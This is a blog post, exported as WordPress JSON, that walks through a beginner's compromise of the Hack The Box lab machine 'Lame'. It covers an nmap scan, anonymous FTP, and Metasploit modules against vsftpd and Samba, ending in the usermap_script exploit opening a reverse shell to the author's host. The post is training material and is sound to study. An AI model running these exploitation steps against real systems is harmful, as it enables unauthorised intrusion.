{"id":1563,"date":"2021-01-31T21:38:11","date_gmt":"2021-01-31T21:38:11","guid":{"rendered":"https:\/\/osintme.com\/?p=1563"},"modified":"2021-01-31T21:49:52","modified_gmt":"2021-01-31T21:49:52","slug":"hack-the-box-lame-walkthrough","status":"publish","type":"post","link":"https:\/\/osintme.com\/index.php\/2021\/01\/31\/hack-the-box-lame-walkthrough\/","title":{"rendered":"Hack The Box: Lame Walkthrough"},"content":{"rendered":"\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t\t
\n\t\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t\t\t\t\t\t

My 2021 New Year resolution was to take a shot at learning some penetration testing techniques.<\/p>

In cybersecurity OSINT plays a big part – especially in pentesting.<\/p>

But at the same time it is also significantly different to the OSINT that focuses on persons, companies, emails, websites and the general digital footprint.<\/p>

In pentesting, OSINT can mean anything from passive reconnaissance of the target infrastructure, searching for CVEs, literature research (in absolutely any meaning of the word), to lurking on discussion forums or even reaching out to experts for advice.<\/p>

That is why I recently signed up to Hack the Box<\/a> – to do all that; and through it, to learn a ton of new stuff.<\/p>

So here is my first training machine I managed to hack into.<\/p>

The name very aptly describes my current pentesting skills – but from here I can only get better.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t

\n\t\t\t\t\t\t
\n\t\t\t\t\t
\n\t\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t\t\t\t\t\t

LAME Walkthrough<\/h1>

\"Screenshot<\/a><\/p>

This walkthrough was conducted using a Linux Parrot virtual machine.<\/p>

<\/a>Nmap scan<\/h2>

I began with an nmap scan of the machine’s IP address (which is not static, it changes with every instance):<\/p>

sudo nmap -T4 -A -v -p- 10.129.71.202\n\n  -T4 - the scan speed template, ranging from 0 (slow & stealthy) to 5 (fast & obvious)\n\n  -A - operating system and version check\n\n  -v - verbose output\n  \n  -p- - scan all 65535 ports on the IP address\n<\/code><\/pre>
<\/a>Scan result summary<\/h2>
The following 5 ports and services were identified:<\/p>
    21\/tcp   open  ftp          vsftpd 2.3.4\n    \n    22\/tcp   open  ssh          OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)\n    \n    139\/tcp  open  netbios-ssn  Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\n    \n    445\/tcp  open  netbios-ssn  Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)\n    \n    3632\/tcp open  distccd      distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))\n<\/code><\/pre>
\"nmap<\/a><\/p>
<\/a>vsftpd 2.3.4<\/h2>
https:\/\/en.wikipedia.org\/wiki\/Vsftpd<\/a><\/p>
vsftpd is a default FTP (File Transfer Protocol) server for a number of Linux distributions and it’s used for storing and sharing files.<\/p>
Very clearly this is an obsolete version of the service that is highly unlikely to be detected anymore in real life.<\/p>
In 2011 there were reports of an exploit detected on an archived version of vsftpd 2.3.4 that enabled a malicious backdoor execution.<\/p>
Online sources:\u00a0Scary Beast Security<\/a>,\u00a0Exploit DB<\/a>.<\/em><\/p>
It is worth noting that (as per the screenshot above) it is possible to connect anonymously to the FTP service.<\/p>
I started with launching Metasploit Framework in order to find out more about the exploit instead of relying on online sources:<\/p>
    msfconsole\n    \n    msf6 > search vsftpd\n<\/code><\/pre>
\"vsftpd\"<\/a><\/p>
To make use of this exploit, select it from the list (here we only have 1 option marked with a zero):<\/p>
    use 0\n<\/code><\/pre>
I got the message about no payload configured, but then the command defaults to cmd\/unix\/interact.<\/p>
You can display available options by adding the “> show options”<\/p>
    exploit(unix\/ftp\/vsftpd_234_backdoor) > show options\n<\/code><\/pre>
I set the host to the machine’s IP address:<\/p>
    set RHOST 10.129.71.202\n<\/code><\/pre>
Unfortunately, these efforts were met with a message: “Exploit completed, but no session was created”.<\/p>
I went back to the command line, in order to see if connecting directly to the IP address would work…<\/p>
    msf6 > exit\n\n    ftp 10.129.71.202\n<\/code><\/pre>
When prompted here I tried a number of generic user names (user, admin, test, 123, etc.).<\/p>
I took me a while until I tried “anonymous” (yes, the hint is in the initial scan result).<\/p>
When prompted for password, I just hit ENTER.<\/p>
\"ftp\"<\/a><\/p>
Admittedly, I had no idea what to do next. I found a list of Linux FTP commands from\u00a0here<\/a>\u00a0and tried them all one after the other.<\/p>
Nothing worked.<\/p>
NOTE:<\/strong>\u00a0At this point I took a long break and forgot to extend the uptime on the Lame machine.<\/p>
This resulted in reseting the IP address, so I relaunched the machine on a new IP – 10.129.89.92.<\/p>
<\/a>OpenSSH 4.7p1<\/h2>
https:\/\/en.wikipedia.org\/wiki\/OpenSSH<\/a><\/p>
OpenSSH (Secure Shell) is an encrypted, remote access service.<\/p>
Version 4.7p1 has some known vulnerabilities listed\u00a0here<\/a>.<\/p>
Searching Metasploit again revealed some exploits for Windows OS, clearly of no use here.<\/p>
<\/a>Samba smbd 3.X – 4.X<\/h2>
https:\/\/en.wikipedia.org\/wiki\/Samba_(software)<\/a><\/p>
Samba is a service that provides file and printer sharing options across various operating systems.<\/p>
Metasploit lists 19 different vulnerabilities for the Samba 3 version. Not all of these apply as some relate to Windows and Unix systems.<\/p>
I could have tried the relevant exploits one by one, but the better idea is to start with those ranked the highest (excellent).<\/p>
6 exploit\/linux\/samba\/is_known_pipename  2017-03-24  excellent  Samba is_known_pipename() Arbitrary Module Load\n<\/code><\/pre>
The above exploit however seems to require\u00a0valid credentials<\/a>, which I did not have. So I tried another:<\/p>
9 exploit\/linux\/samba\/trans2open  2003-04-07  great  Samba trans2open Overflow (Linux x86)\n\nmsf6 exploit > use 9\n[*] No payload configured, defaulting to linux\/x86\/meterpreter\/reverse_tcp\nmsf6 exploit(linux\/samba\/trans2open) > set RHOSTS 10.129.89.92\nRHOSTS => 10.129.89.92\nmsf6 exploit(linux\/samba\/trans2open) > run\n\n[*] Started reverse TCP handler on 10.0.2.15:4444 \n[*] 10.129.89.92:139 - Trying return address 0xbffffdfc...\n[-] 10.129.89.92:139 - Exploit aborted due to failure: no-target: This target is not a vulnerable Samba server (Samba 3.0.20-Debian)\n[*]Exploit completed, but no session was created.\n<\/code><\/pre>
I unsuccessfully tried a number of times, including the next exploit on the list:<\/p>
11  exploit\/multi\/samba\/usermap_script  2007-05-14   excellent   Samba \"username map script\" Command Execution\n\nmsf6 > use 11\n[*] No payload configured, defaulting to cmd\/unix\/reverse_netcat\nmsf6 exploit(multi\/samba\/usermap_script) > set RHOSTS 10.129.89.92\nRHOSTS => 10.129.89.92\nmsf6 exploit(multi\/samba\/usermap_script) > run\n\n[*] Started reverse TCP handler on 10.0.2.15:4444 \n[*] Exploit completed, but no session was created.\n<\/code><\/pre>
It took me a while to understand what I was doing wrong here.<\/p>
msf6 exploit(multi\/samba\/usermap_script) > options\n<\/code><\/pre>
The key was to understand that both the RHOSTS and LHOST IP addresses must be set correctly:<\/p>
\"Screenshot<\/a><\/p>
In my case this was not configured by default.<\/p>
Luckily, the ifconfig command lets you check the tun0 address.<\/p>
Then simply set LHOST to that IP:<\/p>
msf6 exploit(multi\/samba\/usermap_script) > set LHOST 10.10.14.101\n<\/code><\/pre>
Once everything is set, time to put the exploit to a test:<\/p>
msf6 exploit(multi\/samba\/usermap_script) > run\n\n[*] Started reverse TCP handler on 10.10.14.101:4444 \n[*] Command shell session 1 opened (10.10.14.101:4444 -> 10.129.89.92:56128) at 2021-01-31 15:20:45 -0500\n<\/code><\/pre>
Listing directories with the dir command showed the presence of home and root directories.<\/p>
I navigated wit the cd, ls \/ dir<\/strong> commands between home and root, then searched for text files and used the cat<\/strong> command to grab hash values:<\/p>
\"Screenshot<\/a><\/p>
Don’t forget to return both user and root flags and claim ownership of Lame!<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"
I explore another meaning of OSINT as I mark the beginning of my adventure with the Hack the Box platform.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[18],"tags":[60,121,11,83,122,87],"class_list":["post-1563","post","type-post","status-publish","format-standard","hentry","category-digital-privacy-security","tag-hacking","tag-htb","tag-linux","tag-manuals","tag-pentesting","tag-training"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/osintme.com\/index.php\/wp-json\/wp\/v2\/posts\/1563","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/osintme.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/osintme.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/osintme.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/osintme.com\/index.php\/wp-json\/wp\/v2\/comments?post=1563"}],"version-history":[{"count":13,"href":"https:\/\/osintme.com\/index.php\/wp-json\/wp\/v2\/posts\/1563\/revisions"}],"predecessor-version":[{"id":1576,"href":"https:\/\/osintme.com\/index.php\/wp-json\/wp\/v2\/posts\/1563\/revisions\/1576"}],"wp:attachment":[{"href":"https:\/\/osintme.com\/index.php\/wp-json\/wp\/v2\/media?parent=1563"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/osintme.com\/index.php\/wp-json\/wp\/v2\/categories?post=1563"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/osintme.com\/index.php\/wp-json\/wp\/v2\/tags?post=1563"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}